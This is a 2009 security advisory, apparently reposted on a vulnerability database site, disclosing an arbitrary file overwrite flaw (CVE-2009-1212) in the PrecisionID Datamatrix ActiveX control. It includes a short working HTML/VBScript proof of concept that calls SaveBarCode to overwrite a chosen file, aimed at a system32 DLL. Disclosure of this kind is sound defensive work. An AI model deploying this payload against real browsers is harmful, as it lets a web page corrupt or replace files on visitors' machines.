PrecisionID Datamatrix ActiveX control - Arbitrary File overwriting

2009.04.02
Credit: DSecRG
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1212
CWE: NVD-CWE-Other


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Complete
Availability impact: None

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-030 !!! original advisory !!! http://dsecrg.com/pages/vul/DSECRG-09-030.html Application: PrecisionID activeX controls Versions Affected: Vendor URL: http://PrecisionID.com Bugs: Arbitrary File overwriting Exploits: YES Reported: 03.03.2009 Vendor response: NONE Secondly Reported: 17.03.2009 Vendor response: NONE Date of Public Advisory: 31.0300.2009 Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** PrecisionID have activeX control DMATRIXLib.Datamatrix that can be used to overwrite any any file in target system. Details ******* This control contains two methods SaveBarCode() SaveEnhWMF() that can be used to owervrite any file on OS Sub SaveBarCode ( ByVal path As String ) Sub SaveEnhWMF ( ByVal path As String ) ******* Example: <html> <object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='target' /> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\PRECIS~2.DLL" prototype = "Sub SaveBarCode ( ByVal path As String )" memberName = "SaveBarCode" progid = "DMATRIXLib.Datamatrix" argCount = 1 arg1="C:\sh2kerr.pwn" target.SaveBarCode arg1 </script> </html> Solution ******** http://msdn.microsoft.com/en-us/library/aa751977.aspx About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru Regards, Digital Security Research Group [DSecRG] ________________________________________ DIGITAL SECURITY tel/fax: +7(812)703-1547 tel: +7(812)430-9130 e-mail: research (at) dsecrg (dot) com [email concealed] web: www.dsecrg.com ---------------------------------------- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ----------------------------------------

References:

http://dsecrg.com/pages/vul/DSECRG-09-030.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top